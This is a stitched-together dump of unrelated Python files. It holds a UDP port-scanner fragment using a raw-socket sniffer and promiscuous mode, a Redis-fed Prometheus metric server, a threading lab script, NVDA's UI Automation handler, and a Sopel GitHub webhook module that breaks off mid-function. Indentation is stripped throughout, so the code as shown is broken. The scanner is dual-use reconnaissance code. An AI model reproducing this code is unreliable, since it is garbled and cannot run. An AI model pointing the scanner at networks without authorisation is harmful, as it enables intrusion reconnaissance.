hosts = args.host
target = hosts.split(",")
sock_add_family = socket.AF_INET
sock_ip_proto = socket.IPPROTO_IP
global port
outputfilestr = ""
sniffer = socket.socket(sock_add_family, socket.SOCK_RAW, socket.IPPROTO_UDP)
sniffer.bind((host, 0))
sniffer.setsockopt(sock_ip_proto, socket.IP_HDRINCL, 1)
sniffer.settimeout(int(float(timeout) * 60))  # Timeout is given in minutes; convert to seconds
f = open(outputfilename, 'a+') # a+
f.write("Scanning following IPs: \n\n" + str(target) + "\n\n")
f.truncate()
f.close()
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)  # Enable promiscuous mode on Windows; might not be necessary in this case
t = threading.Thread(target=udp_sender, args=(target, pack, args))
t.start()
printflag = "false"
try:
while True:
raw_buffer = sniffer.recvfrom(65565)
snif = binascii.hexlify(raw_buffer[0])
source_ip = raw_buffer[1][0]
destination_ip = ""
if "." in source_ip:
port = str(int(snif[40:44], 16))  # IPv4: skip the 20-byte IP header (40 hex chars); the next 2 bytes are the UDP source port
elif ":" in source_ip:
port = str(int(snif[0:4], 16)) # FOR IPv6
if snif != "" and printflag == "false":
print("%-40s %-10s %-5s %s" % ("IP", "PORT(UDP)", "STAT", "SERVICE"))
printflag = "true"
printservice = ""
for i in range(len(probemaster)):
if int(probemaster[i][0]) == int(port):
for ii in range(len(probemaster[i][1])):
if printservice != "":
printservice += "/"
printservice += probemaster[i][1][ii][0]
if printservice == "":
printservice = "Unknown Service"
noisyport = "true"
pack_port = []
for i in range(len(pack)):
pack_port.append(str(pack[i][0]))
if '%' in str(source_ip):
source_ip = str(source_ip)[0:str(source_ip).index('%')]
if (((port in pack_port) and (str(source_ip) in target) and (noise in ["False", "false"])) or (
noise in ["True", "true"])) and ((str(source_ip), port) not in output_tuple):
if str(source_ip) != "::1":
print("%-40s %-10s open %s" % (str(source_ip), port, printservice))
output.append([str(source_ip), port, printservice, snif])
output_tuple.append((str(source_ip), port))
if args.verbose not in ["false", "False"]:
outputfilestr = "Host: " + str(source_ip) + "; PORT: " + str(
port) + ";" + ' STATE: open' + "; UDP Service:" + str(printservice) + "; " + str(snif) + " \n\n"
else:
outputfilestr = "Host: " + str(source_ip) + "; PORT: " + str(
port) + ";" + ' STATE: open' + "; UDP Service:" + str(printservice) + " \n\n"
if args.output:
f = open(outputfilename, 'a+')
f.write(outputfilestr)
f.truncate()
f.close()
except socket.timeout:
if float(timeout) >= 1.0:
print("\nINFO: Sniffer timeout was set to " + str(timeout) + " minutes")
else:
print("\nINFO: Sniffer timeout was set to " + str(float(timeout) * 60) + " seconds")
except Exception as e:
print("\nError occured: 20001, More information: :" + str(e))
# handle CTRL-C
except KeyboardInterrupt:
# Windows turn off promiscuous mode
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
finally:
for phdata in probehelplist:
for odata in output:
if odata[1] == phdata[0]:
helpdata.append(str(odata[2]) + "(port " + str(odata[1]) + "):" + str(phdata[1]))
|
server.py
|
from __future__ import absolute_import
from prometheus_client import start_http_server, Gauge, Counter, Histogram, Summary
import redis
import json
import logging
import sys
if sys.version_info < (3, 0):
from subprocess32 import call
else:
from subprocess import call
import psutil
from .schema import validate_schema, Prom_Type
from jsonschema import ValidationError
from .config import CHANNEL_NAME, DEFAULT_BUCKETS, UNIX_SOCKET_PATH
class Metric:
"""
The Metric class abstracts away the complexity of dealing with Prometheus
data types.
"""
def __init__(self, name, metric_type, description, buckets):
self.name = name
self.type = metric_type
if metric_type == 'Counter':
self._metric = Counter(name, description)
elif metric_type == 'Gauge':
self._metric = Gauge(name, description)
elif metric_type == 'Histogram':
self._metric = Histogram(name, description, buckets=buckets)
elif metric_type == 'Summary':
self._metric = Summary(name, description)
def report(self, value):
value = float(value)
if self.type == 'Counter':
self._metric.inc(value)
elif self.type == 'Gauge':
self._metric.set(value)
elif self.type == 'Histogram' or self.type == 'Summary':
self._metric.observe(value)
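# Illustrative only: how Metric wraps the prometheus_client types. The metric name
# and value below are made up; DEFAULT_BUCKETS is imported from .config above.
#
#   m = Metric('queue_depth', 'Gauge', 'Current queue depth', DEFAULT_BUCKETS)
#   m.report(17)   # equivalent to Gauge.set(17.0)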
def add_metric(name, metric_type, description, buckets, metric_pool):
metric_pool[name] = Metric(name, metric_type, description, buckets)
def report_metric(name, val, metric_pool):
if name in metric_pool:
metric_pool[name].report(val)
else:
logger = logging.getLogger(__name__)
logger.error("{} not found in metric pool: {}".format(
name, metric_pool.keys()))
def handle_message(message_dict, metric_pool):
"""
Handle a message dictionary, dispatch request to add or report call
"""
endpoint = message_dict['endpoint']
data = message_dict['data']
if endpoint == 'add':
add_metric(data['name'], data['type'], data['description'],
data.get('buckets', DEFAULT_BUCKETS), metric_pool)
elif endpoint == 'report':
report_metric(data['name'], data['data'], metric_pool)
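# Illustrative only: the JSON messages handle_message() expects on the Redis
# channel (an 'add' to register a metric, then 'report' calls to record values).
# The metric name and value below are made up; a client might publish them with
# redis-py roughly like this:
#
#   r = redis.Redis(unix_socket_path=UNIX_SOCKET_PATH)
#   r.publish(CHANNEL_NAME, json.dumps({
#       "endpoint": "add",
#       "data": {"name": "request_latency", "type": "Histogram",
#                "description": "Request latency in seconds"}}))
#   r.publish(CHANNEL_NAME, json.dumps({
#       "endpoint": "report",
#       "data": {"name": "request_latency", "data": 0.23}}))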
def start_server():
logger = _init_logger()
start_http_server(1390)
logger.info("Metric Server Started!")
r = redis.Redis(unix_socket_path=UNIX_SOCKET_PATH)
sub = r.pubsub(ignore_subscribe_messages=True)
sub.subscribe(CHANNEL_NAME)
logger.info("Redis Connected! Waiting for messages...")
metric_pool = {}
for message in sub.listen(): # Blocking, will run forever
logger.debug(message)
try:
if sys.version_info < (3, 0):
message_dict = json.loads(message['data'])
else:
message_dict = json.loads(message['data'].decode('utf-8'))
validate_schema(message_dict)
handle_message(message_dict, metric_pool)
except (KeyError, ValueError, ValidationError) as e:
# Here, we catch errors in
# (1) message['data'], the redis queue is not sending correct
# message in expected format.
# (2) json.loads, the json string is corrupted.
# (3) validate_schema will throw ValidationError if schema
# validation failed.
#
# Note:
# (2) leads to json ValueError in python2,
# json.JSONDecodeError (a ValueError subclass) in python3
logger.error(e)
def _init_logger():
logging.basicConfig(
filename='/metric_server.log',
format=
'%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%y-%m-%d:%H:%M:%S',
level=logging.DEBUG)
logger = logging.getLogger(__name__)
return logger
def start_redis_daemon():
cmd = [
'redis-server', '--unixsocket', '/tmp/redis.sock', '--daemonize', 'yes'
]
call(cmd)
def redis_daemon_exist():
# We can just check for the 'redis-server' process because the default
# situation is that we are in a container without any other python2
# process.
pids = psutil.pids()
process_names = []
for pid in pids:
try:
name = psutil.Process(pid).name()
except psutil.NoSuchProcess:
name = None
process_names.append(name)
return 'redis-server' in process_names
if __name__ == '__main__':
start_redis_daemon()
# This snippet of code spins up a debug server
# that serves the log on port 1392. Don't forget to add
# the debug line to container manager as well!
if len(sys.argv) > 1 and sys.argv[-1] == 'DEBUG':
def start_debug_server():
from flask import Flask, send_file, jsonify
app = Flask(__name__)
@app.route('/')
def show_log():
return send_file('/metric_server.log')
app.run(host='0.0.0.0', port=1392)
from multiprocessing import Process
debug_proc = Process(target=start_debug_server)
debug_proc.start()
start_server()
|
lab3.py
|
import time, os
from threading import Thread, current_thread
from multiprocessing import Process, current_process, Pool
import sys
COUNT = 200000000
SLEEP = 10
def io_bound(sec):
pid = os.getpid()
threadName = current_thread().name
processName = current_process().name
#print(f"{pid} * {processName} * {threadName} ---> Start sleeping...")
print(pid," * ",processName," * ",threadName," ---> Start sleeping...")
time.sleep(sec)
print(pid," * ",processName," * ",threadName," ---> Finish sleeping...")
#print(f"{pid} * {processName} * {threadName} ---> Finished sleeping...")
def cpu_bound(n):
pid = os.getpid()
threadName = current_thread().name
processName = current_process().name
print(f"{pid} * {processName} * {threadName} ---> Start counting...")
while n>0:
n -= 1
print(f"{pid} * {processName} * {threadName} ---> Finished counting...")
if __name__=="__main__":
start = time.time()
if len(sys.argv)!=2:
print("USO: python lab3.py DEBUG")
sys.exit(1)
DEBUG=int(sys.argv[1])
if DEBUG==1:
io_bound(SLEEP)
io_bound(SLEEP)
elif DEBUG==2:
t1 = Thread(target = io_bound, args =(SLEEP, ))
t2 = Thread(target = io_bound, args =(SLEEP, ))
t1.start()
t2.start()
t1.join()
t2.join()
elif DEBUG==3:
cpu_bound(COUNT)
cpu_bound(COUNT)
elif DEBUG==4:
t1 = Thread(target = cpu_bound, args =(COUNT, ))
t2 = Thread(target = cpu_bound, args =(COUNT, ))
t1.start()
t2.start()
t1.join()
t2.join()
elif DEBUG==5:
p1 = Process(target = cpu_bound, args =(COUNT, ))
p2 = Process(target = cpu_bound, args =(COUNT, ))
p1.start()
p2.start()
p1.join()
p2.join()
elif DEBUG==6:
pool = Pool(processes=2)
pool.apply_async(cpu_bound, [COUNT])
pool.apply_async(cpu_bound, [COUNT])
pool.close()
pool.join()
elif DEBUG==7:
p1 = Process(target = io_bound, args =(SLEEP, ))
p2 = Process(target = io_bound, args =(SLEEP, ))
p1.start()
p2.start()
p1.join()
p2.join()
end = time.time()
print('Time taken in seconds -', end - start)
|
_UIAHandler.py
|
#_UIAHandler.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2011-2018 NV Access Limited, Joseph Lee, Babbage B.V.
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
from ctypes import *
from ctypes.wintypes import *
import comtypes.client
from comtypes.automation import VT_EMPTY
from comtypes import *
import weakref
import threading
import time
import config
import api
import appModuleHandler
import queueHandler
import controlTypes
import NVDAHelper
import winKernel
import winUser
import eventHandler
from logHandler import log
import UIAUtils
from comtypes.gen.UIAutomationClient import *
#Some newer UIA constants that could be missing
ItemIndex_Property_GUID=GUID("{92A053DA-2969-4021-BF27-514CFC2E4A69}")
ItemCount_Property_GUID=GUID("{ABBF5C45-5CCC-47b7-BB4E-87CB87BBD162}")
HorizontalTextAlignment_Left=0
HorizontalTextAlignment_Centered=1
HorizontalTextAlignment_Right=2
HorizontalTextAlignment_Justified=3
# The name of the WDAG (Windows Defender Application Guard) process
WDAG_PROCESS_NAME=u'hvsirdpclient'
goodUIAWindowClassNames=[
# A WDAG (Windows Defender Application Guard) Window is always native UIA, even if it doesn't report as such.
'RAIL_WINDOW',
]
badUIAWindowClassNames=[
"SysTreeView32",
"WuDuiListView",
"ComboBox",
"msctls_progress32",
"Edit",
"CommonPlacesWrapperWndClass",
"SysMonthCal32",
"SUPERGRID", #Outlook 2010 message list
"RichEdit",
"RichEdit20",
"RICHEDIT50W",
"SysListView32",
"EXCEL7",
"Button",
# #7497: Windows 10 Fall Creators Update has an incomplete UIA implementation for console windows, therefore for now we should ignore it.
# It does not implement caret/selection, and probably has no new text events.
"ConsoleWindowClass",
# #8944: The Foxit UIA implementation is incomplete and should not be used for now.
"FoxitDocWnd",
]
# #8405: used to detect UIA dialogs prior to Windows 10 RS5.
UIADialogClassNames=[
"#32770",
"NUIDialog",
"Credential Dialog Xaml Host", # UAC dialog in Anniversary Update and later
"Shell_Dialog",
"Shell_Flyout",
"Shell_SystemDialog", # Various dialogs in Windows 10 Settings app
]
NVDAUnitsToUIAUnits={
"character":TextUnit_Character,
"word":TextUnit_Word,
"line":TextUnit_Line,
"paragraph":TextUnit_Paragraph,
"readingChunk":TextUnit_Line,
}
UIAControlTypesToNVDARoles={
UIA_ButtonControlTypeId:controlTypes.ROLE_BUTTON,
UIA_CalendarControlTypeId:controlTypes.ROLE_CALENDAR,
UIA_CheckBoxControlTypeId:controlTypes.ROLE_CHECKBOX,
UIA_ComboBoxControlTypeId:controlTypes.ROLE_COMBOBOX,
UIA_EditControlTypeId:controlTypes.ROLE_EDITABLETEXT,
UIA_HyperlinkControlTypeId:controlTypes.ROLE_LINK,
UIA_ImageControlTypeId:controlTypes.ROLE_GRAPHIC,
UIA_ListItemControlTypeId:controlTypes.ROLE_LISTITEM,
UIA_ListControlTypeId:controlTypes.ROLE_LIST,
UIA_MenuControlTypeId:controlTypes.ROLE_POPUPMENU,
UIA_MenuBarControlTypeId:controlTypes.ROLE_MENUBAR,
UIA_MenuItemControlTypeId:controlTypes.ROLE_MENUITEM,
UIA_ProgressBarControlTypeId:controlTypes.ROLE_PROGRESSBAR,
UIA_RadioButtonControlTypeId:controlTypes.ROLE_RADIOBUTTON,
UIA_ScrollBarControlTypeId:controlTypes.ROLE_SCROLLBAR,
UIA_SliderControlTypeId:controlTypes.ROLE_SLIDER,
UIA_SpinnerControlTypeId:controlTypes.ROLE_SPINBUTTON,
UIA_StatusBarControlTypeId:controlTypes.ROLE_STATUSBAR,
UIA_TabControlTypeId:controlTypes.ROLE_TABCONTROL,
UIA_TabItemControlTypeId:controlTypes.ROLE_TAB,
UIA_TextControlTypeId:controlTypes.ROLE_STATICTEXT,
UIA_ToolBarControlTypeId:controlTypes.ROLE_TOOLBAR,
UIA_ToolTipControlTypeId:controlTypes.ROLE_TOOLTIP,
UIA_TreeControlTypeId:controlTypes.ROLE_TREEVIEW,
UIA_TreeItemControlTypeId:controlTypes.ROLE_TREEVIEWITEM,
UIA_CustomControlTypeId:controlTypes.ROLE_UNKNOWN,
UIA_GroupControlTypeId:controlTypes.ROLE_GROUPING,
UIA_ThumbControlTypeId:controlTypes.ROLE_THUMB,
UIA_DataGridControlTypeId:controlTypes.ROLE_DATAGRID,
UIA_DataItemControlTypeId:controlTypes.ROLE_DATAITEM,
UIA_DocumentControlTypeId:controlTypes.ROLE_DOCUMENT,
UIA_SplitButtonControlTypeId:controlTypes.ROLE_SPLITBUTTON,
UIA_WindowControlTypeId:controlTypes.ROLE_WINDOW,
UIA_PaneControlTypeId:controlTypes.ROLE_PANE,
UIA_HeaderControlTypeId:controlTypes.ROLE_HEADER,
UIA_HeaderItemControlTypeId:controlTypes.ROLE_HEADERITEM,
UIA_TableControlTypeId:controlTypes.ROLE_TABLE,
UIA_TitleBarControlTypeId:controlTypes.ROLE_TITLEBAR,
UIA_SeparatorControlTypeId:controlTypes.ROLE_SEPARATOR,
}
UIAPropertyIdsToNVDAEventNames={
UIA_NamePropertyId:"nameChange",
UIA_HelpTextPropertyId:"descriptionChange",
UIA_ExpandCollapseExpandCollapseStatePropertyId:"stateChange",
UIA_ToggleToggleStatePropertyId:"stateChange",
UIA_IsEnabledPropertyId:"stateChange",
UIA_ValueValuePropertyId:"valueChange",
UIA_RangeValueValuePropertyId:"valueChange",
UIA_ControllerForPropertyId:"UIA_controllerFor",
}
UIAEventIdsToNVDAEventNames={
UIA_LiveRegionChangedEventId:"liveRegionChange",
#UIA_Text_TextChangedEventId:"textChanged",
UIA_SelectionItem_ElementSelectedEventId:"UIA_elementSelected",
UIA_MenuOpenedEventId:"gainFocus",
UIA_SelectionItem_ElementAddedToSelectionEventId:"stateChange",
UIA_SelectionItem_ElementRemovedFromSelectionEventId:"stateChange",
#UIA_MenuModeEndEventId:"menuModeEnd",
#UIA_Text_TextSelectionChangedEventId:"caret",
UIA_ToolTipOpenedEventId:"UIA_toolTipOpened",
#UIA_AsyncContentLoadedEventId:"documentLoadComplete",
#UIA_ToolTipClosedEventId:"hide",
UIA_Window_WindowOpenedEventId:"UIA_window_windowOpen",
UIA_SystemAlertEventId:"UIA_systemAlert",
}
class UIAHandler(COMObject):
_com_interfaces_=[IUIAutomationEventHandler,IUIAutomationFocusChangedEventHandler,IUIAutomationPropertyChangedEventHandler,IUIAutomationNotificationEventHandler]
def __init__(self):
super(UIAHandler,self).__init__()
self.MTAThreadInitEvent=threading.Event()
self.MTAThreadStopEvent=threading.Event()
self.MTAThreadInitException=None
self.MTAThread=threading.Thread(target=self.MTAThreadFunc)
self.MTAThread.daemon=True
self.MTAThread.start()
self.MTAThreadInitEvent.wait(2)
if self.MTAThreadInitException:
raise self.MTAThreadInitException
def terminate(self):
MTAThreadHandle=HANDLE(windll.kernel32.OpenThread(winKernel.SYNCHRONIZE,False,self.MTAThread.ident))
self.MTAThreadStopEvent.set()
#Wait for the MTA thread to die (while still message pumping)
if windll.user32.MsgWaitForMultipleObjects(1,byref(MTAThreadHandle),False,200,0)!=0:
log.debugWarning("Timeout or error while waiting for UIAHandler MTA thread")
windll.kernel32.CloseHandle(MTAThreadHandle)
del self.MTAThread
def MTAThreadFunc(self):
try:
oledll.ole32.CoInitializeEx(None,comtypes.COINIT_MULTITHREADED)
isUIA8=False
try:
self.clientObject=CoCreateInstance(CUIAutomation8._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
isUIA8=True
except (COMError,WindowsError,NameError):
self.clientObject=CoCreateInstance(CUIAutomation._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
# #7345: Instruct UIA to never map MSAA winEvents to UIA propertyChange events.
# These events are not needed by NVDA, and they can cause the UI Automation client library to become unresponsive if an application firing winEvents has a slow message pump.
pfm=self.clientObject.proxyFactoryMapping
for index in xrange(pfm.count):
e=pfm.getEntry(index)
for propertyID in UIAPropertyIdsToNVDAEventNames.keys():
# Check if this proxy has mapped any winEvents to the UIA propertyChange event for this property ID
try:
oldWinEvents=e.getWinEventsForAutomationEvent(UIA_AutomationPropertyChangedEventId,propertyID)
except IndexError:
# comtypes does not seem to correctly handle a returned empty SAFEARRAY, raising IndexError
oldWinEvents=None
if oldWinEvents:
# As winEvents were mapped, replace them with an empty list
e.setWinEventsForAutomationEvent(UIA_AutomationPropertyChangedEventId,propertyID,[])
# Changes to an entry are not automatically picked up.
# Therefore remove the entry and re-insert it.
pfm.removeEntry(index)
pfm.insertEntry(index,e)
if isUIA8:
# #8009: use appropriate interface based on highest supported interface.
# #8338: made easier by traversing interfaces supported on Windows 8 and later in reverse.
for interface in reversed(CUIAutomation8._com_interfaces_):
try:
self.clientObject=self.clientObject.QueryInterface(interface)
break
except COMError:
pass
# Windows 10 RS5 provides new performance features for UI Automation including event coalescing and connection recovery.
# Enable all of these where available.
if isinstance(self.clientObject,IUIAutomation6):
self.clientObject.CoalesceEvents=CoalesceEventsOptions_Enabled
self.clientObject.ConnectionRecoveryBehavior=ConnectionRecoveryBehaviorOptions_Enabled
log.info("UIAutomation: %s"%self.clientObject.__class__.__mro__[1].__name__)
self.windowTreeWalker=self.clientObject.createTreeWalker(self.clientObject.CreateNotCondition(self.clientObject.CreatePropertyCondition(UIA_NativeWindowHandlePropertyId,0)))
self.windowCacheRequest=self.clientObject.CreateCacheRequest()
self.windowCacheRequest.AddProperty(UIA_NativeWindowHandlePropertyId)
self.UIAWindowHandleCache={}
self.baseTreeWalker=self.clientObject.RawViewWalker
self.baseCacheRequest=self.windowCacheRequest.Clone()
import UIAHandler
self.ItemIndex_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemIndex_Property_GUID),u"ItemIndex",1)
self.ItemCount_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemCount_Property_GUID),u"ItemCount",1)
for propertyId in (UIA_FrameworkIdPropertyId,UIA_AutomationIdPropertyId,UIA_ClassNamePropertyId,UIA_ControlTypePropertyId,UIA_ProviderDescriptionPropertyId,UIA_ProcessIdPropertyId,UIA_IsTextPatternAvailablePropertyId,UIA_IsContentElementPropertyId,UIA_IsControlElementPropertyId):
self.baseCacheRequest.addProperty(propertyId)
self.baseCacheRequest.addPattern(UIA_TextPatternId)
self.rootElement=self.clientObject.getRootElementBuildCache(self.baseCacheRequest)
self.reservedNotSupportedValue=self.clientObject.ReservedNotSupportedValue
self.ReservedMixedAttributeValue=self.clientObject.ReservedMixedAttributeValue
self.clientObject.AddFocusChangedEventHandler(self.baseCacheRequest,self)
self.clientObject.AddPropertyChangedEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self,UIAPropertyIdsToNVDAEventNames.keys())
for x in UIAEventIdsToNVDAEventNames.iterkeys():
self.clientObject.addAutomationEventHandler(x,self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
# #7984: add support for notification event (IUIAutomation5, part of Windows 10 build 16299 and later).
if isinstance(self.clientObject, IUIAutomation5):
self.clientObject.AddNotificationEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
except Exception as e:
self.MTAThreadInitException=e
finally:
self.MTAThreadInitEvent.set()
self.MTAThreadStopEvent.wait()
self.clientObject.RemoveAllEventHandlers()
def IUIAutomationEventHandler_HandleAutomationEvent(self,sender,eventID):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
if eventID==UIA_MenuOpenedEventId and eventHandler.isPendingEvents("gainFocus"):
# We don't need the menuOpened event if focus has been fired,
# as focus should be more correct.
return
NVDAEventName=UIAEventIdsToNVDAEventNames.get(eventID,None)
if not NVDAEventName:
return
if not self.isNativeUIAElement(sender):
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if (
not obj
or (NVDAEventName=="gainFocus" and not obj.shouldAllowUIAFocusEvent)
or (NVDAEventName=="liveRegionChange" and not obj._shouldAllowUIALiveRegionChangeEvent)
):
return
focus=api.getFocusObject()
if obj==focus:
obj=focus
eventHandler.queueEvent(NVDAEventName,obj)
def IUIAutomationFocusChangedEventHandler_HandleFocusChangedEvent(self,sender):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
if not self.isNativeUIAElement(sender):
return
import NVDAObjects.UIA
if isinstance(eventHandler.lastQueuedFocusObject,NVDAObjects.UIA.UIA):
lastFocus=eventHandler.lastQueuedFocusObject.UIAElement
# Ignore duplicate focus events.
# It seems that it is possible for compareElements to return True, even though the objects are different.
# Therefore, don't ignore the event if the last focus object has lost its hasKeyboardFocus state.
if self.clientObject.compareElements(sender,lastFocus) and lastFocus.currentHasKeyboardFocus:
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent("gainFocus",windowHandle=window):
return
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj or not obj.shouldAllowUIAFocusEvent:
return
eventHandler.queueEvent("gainFocus",obj)
def IUIAutomationPropertyChangedEventHandler_HandlePropertyChangedEvent(self,sender,propertyId,newValue):
# #3867: For now manually force this VARIANT type to empty to get around a nasty double free in comtypes/ctypes.
# We also don't use the value in this callback.
newValue.vt=VT_EMPTY
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
NVDAEventName=UIAPropertyIdsToNVDAEventNames.get(propertyId,None)
if not NVDAEventName:
return
if not self.isNativeUIAElement(sender):
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj:
return
focus=api.getFocusObject()
if obj==focus:
obj=focus
eventHandler.queueEvent(NVDAEventName,obj)
def IUIAutomationNotificationEventHandler_HandleNotificationEvent(self,sender,NotificationKind,NotificationProcessing,displayString,activityId):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj:
# Sometimes notification events can be fired on a UIAElement that has no windowHandle and does not connect through parents back to the desktop.
# There is nothing we can do with these.
return
eventHandler.queueEvent("UIA_notification",obj, notificationKind=NotificationKind, notificationProcessing=NotificationProcessing, displayString=displayString, activityId=activityId)
def _isUIAWindowHelper(self,hwnd):
# UIA in NVDA's process freezes in Windows 7 and below
processID=winUser.getWindowThreadProcessID(hwnd)[0]
if windll.kernel32.GetCurrentProcessId()==processID:
return False
import NVDAObjects.window
windowClass=NVDAObjects.window.Window.normalizeWindowClassName(winUser.getClassName(hwnd))
# For certain window classes, we always want to use UIA.
if windowClass in goodUIAWindowClassNames:
return True
# allow the appModule for the window to also choose if this window is good
# An appModule should be able to override bad UIA class names as prescribed by core
appModule=appModuleHandler.getAppModuleFromProcessID(processID)
if appModule and appModule.isGoodUIAWindow(hwnd):
return True
# There are certain window classes that just had bad UIA implementations
if windowClass in badUIAWindowClassNames:
return False
if windowClass=="NetUIHWND":
parentHwnd=winUser.getAncestor(hwnd,winUser.GA_ROOT)
# #2816: Outlook 2010 auto complete does not fire enough UIA events, IAccessible is better.
# #4056: Combo boxes in Office 2010 Options dialogs don't expose a name via UIA, but do via MSAA.
if winUser.getClassName(parentHwnd) in {"Net UI Tool Window","NUIDialog"}:
return False
# allow the appModule for the window to also choose if this window is bad
if appModule and appModule.isBadUIAWindow(hwnd):
return False
# Ask the window if it supports UIA natively
res=windll.UIAutomationCore.UiaHasServerSideProvider(hwnd)
if res:
# the window does support UIA natively, but
# Microsoft Word should not use UIA unless we can't inject or the user explicitly chose to use UIA with Microsoft word
if windowClass=="_WwG" and not (config.conf['UIA']['useInMSWordWhenAvailable'] or not appModule.helperLocalBindingHandle):
return False
return bool(res)
def isUIAWindow(self,hwnd):
now=time.time()
v=self.UIAWindowHandleCache.get(hwnd,None)
if not v or (now-v[1])>0.5:
v=self._isUIAWindowHelper(hwnd),now
self.UIAWindowHandleCache[hwnd]=v
return v[0]
def getNearestWindowHandle(self,UIAElement):
if hasattr(UIAElement,"_nearestWindowHandle"):
# Called previously. Use cached result.
return UIAElement._nearestWindowHandle
try:
processID=UIAElement.cachedProcessID
except COMError:
return None
appModule=appModuleHandler.getAppModuleFromProcessID(processID)
# WDAG (Windows Defender Application Guard) UIA elements should be treated as being from a remote machine, and therefore their window handles are completely invalid on this machine.
# Therefore, jump all the way up to the root of the WDAG process and use that window handle as it is local to this machine.
if appModule.appName==WDAG_PROCESS_NAME:
condition=UIAUtils.createUIAMultiPropertyCondition({UIA_ClassNamePropertyId:[u'ApplicationFrameWindow',u'CabinetWClass']})
walker=self.clientObject.createTreeWalker(condition)
else:
# Not WDAG, just walk up to the nearest valid windowHandle
walker=self.windowTreeWalker
try:
new=walker.NormalizeElementBuildCache(UIAElement,self.windowCacheRequest)
except COMError:
return None
try:
window=new.cachedNativeWindowHandle
except COMError:
window=None
# Cache for future use to improve performance.
UIAElement._nearestWindowHandle=window
return window
def isNativeUIAElement(self,UIAElement):
#Due to issues dealing with UIA elements coming from the same process, we do not class these UIA elements as usable.
#It seems to be safe enough to retrieve the cached processID, but using tree walkers or fetching other properties causes a freeze.
try:
processID=UIAElement.cachedProcessId
except COMError:
return False
if processID==windll.kernel32.GetCurrentProcessId():
return False
# Whether this is a native element depends on whether its window natively supports UIA.
windowHandle=self.getNearestWindowHandle(UIAElement)
if windowHandle:
if self.isUIAWindow(windowHandle):
return True
if winUser.getClassName(windowHandle)=="DirectUIHWND" and "IEFRAME.dll" in UIAElement.cachedProviderDescription and UIAElement.currentClassName in ("DownloadBox", "accessiblebutton", "DUIToolbarButton", "PushButton"):
# This is the IE 9 downloads list.
# #3354: UiaHasServerSideProvider returns false for the IE 9 downloads list window,
# so we'd normally use MSAA for this control.
# However, its MSAA implementation is broken (fires invalid events) if UIA is initialised,
# whereas its UIA implementation works correctly.
# Therefore, we must use UIA here.
return True
return False
|
webhook.py
|
# coding=utf8
"""
webhook.py - Sopel GitHub Module
Copyright 2015 Max Gurela
_______ __ __ __ __
| __|__| |_| |--.--.--.| |--.
| | | | _| | | || _ |
|_______|__|____|__|__|_____||_____|
________ __ __ __
| | | |.-----.| |--.| |--.-----.-----.| |--.-----.
| | | || -__|| _ || | _ | _ || <|__ --|
|________||_____||_____||__|__|_____|_____||__|__|_____|
"""
from __future__ import unicode_literals
from sopel import tools
from sopel.formatting import bold, color
from sopel.tools.time import get_timezone, format_time
from .formatting import get_formatted_response
from .formatting import fmt_repo
from .formatting import fmt_name
from threading import Thread
import bottle
import json
import requests
# Because I'm a horrible person
sopel_instance = None
def setup_webhook(sopel):
global sopel_instance
sopel_instance = sopel
host = sopel.config.github.webhook_host
port = sopel.config.github.webhook_port
base = StoppableWSGIRefServer(host=host, port=port)
server = Thread(target=bottle.run, kwargs={'server': base})
server.setDaemon(True)
server.start()
sopel.memory['gh_webhook_server'] = base
sopel.memory['gh_webhook_thread'] = server
conn = sopel.db.connect()
c = conn.cursor()
try:
c.execute('SELECT * FROM gh_hooks')
except Exception:
create_table(sopel, c)
conn.commit()
conn.close()
def create_table(bot, c):
primary_key = '(channel, repo_name)'
c.execute('''CREATE TABLE IF NOT EXISTS gh_hooks (
channel TEXT,
repo_name TEXT,
enabled BOOL DEFAULT 1,
url_color TINYINT DEFAULT 2,
tag_color TINYINT DEFAULT 6,
repo_color TINYINT DEFAULT 13,
name_color TINYINT DEFAULT 15,
hash_color TINYINT DEFAULT 14,
branch_color TINYINT DEFAULT 6,
PRIMARY KEY {0}
)'''.format(primary_key))
def shutdown_webhook(sopel):
global sopel_instance
sopel_instance = None
if sopel.memory.contains('gh_webhook_server'):
print('Stopping webhook server')
sopel.memory['gh_webhook_server'].stop()
sopel.memory['gh_webhook_thread'].join()
print('GitHub webhook shutdown complete')
class StoppableWSGIRefServer(bottle.ServerAdapter):
server = None
def run(self, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
if self.quiet:
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw):
pass
self.options['handler_class'] = QuietHandler
self.server = make_server(self.host, self.port, handler, **self.options)
self.server.serve_forever()
def stop(self):
self.server.shutdown()
def get_targets(repo):
conn = sopel_instance.db.connect()
c = conn.cursor()
c.execute('SELECT * FROM gh_hooks WHERE repo_name = ? AND enabled = 1', (repo.lower(), ))
return c.fetchall()
@bottle.get("/webhook")
def show_hook_info():
